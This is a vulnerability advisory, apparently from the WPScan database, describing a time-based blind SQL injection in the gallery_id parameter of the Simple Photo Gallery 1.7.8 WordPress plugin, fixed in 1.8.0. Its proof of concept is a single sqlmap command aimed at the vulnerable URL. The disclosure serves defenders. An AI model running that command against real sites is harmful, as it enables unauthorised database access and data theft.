Simple Photo Gallery 1.7.8 - Blind SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
MySQL >= 5.0.12 AND time-based blind (SELECT) sql injection in the gallery_id parameter.
Proof of Concept
./sqlmap.py --dbms=MYSQL --technique T -u http://www.example.com/wordpress/index.php/wppg_photogallery/wppg_photo_details/?gallery_id=1&image_id=14

Affects

Plugin simple-photo-gallery
fixed in version 1.8.0

References

OSVDB 122371

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Viktor Gazdag
Submitter Twitter wucpi
Views 202
Verified No
WPVDB ID 8000

Timeline

Publicly Published 2015-05-21 (over 1 year ago)
Added 2015-05-22 (over 1 year ago)
Last Updated 2015-05-22 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.